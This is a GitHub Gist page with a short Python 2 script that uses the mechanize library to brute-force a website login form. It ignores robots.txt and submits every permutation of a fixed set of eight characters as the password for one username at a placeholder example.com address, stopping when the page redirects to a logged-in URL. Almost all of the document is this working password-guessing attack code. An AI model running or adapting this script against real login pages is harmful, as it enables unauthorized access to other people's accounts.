Last active
October 17, 2020 19:22
-
-
Save RDharmaTeja/4b74aa5277166f4b2eaf to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import mechanize | |
import itertools | |
br = mechanize.Browser() | |
br.set_handle_equiv(True) | |
br.set_handle_redirect(True) | |
br.set_handle_referer(True) | |
br.set_handle_robots(False) | |
combos = itertools.permutations("i3^4hUP-",8) | |
br.open("http://www.example.com/login/") | |
for x in combos: | |
br.select_form( nr = 0 ) | |
br.form['userName'] = "user name" | |
br.form['password'] = ''.join(x) | |
print "Checking ",br.form['password'] | |
response=br.submit() | |
if response.geturl()=="http://www.example.com/redirected_to_url": | |
#url to which the page is redirected after login | |
print "Correct password is ",''.join(x) | |
break |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment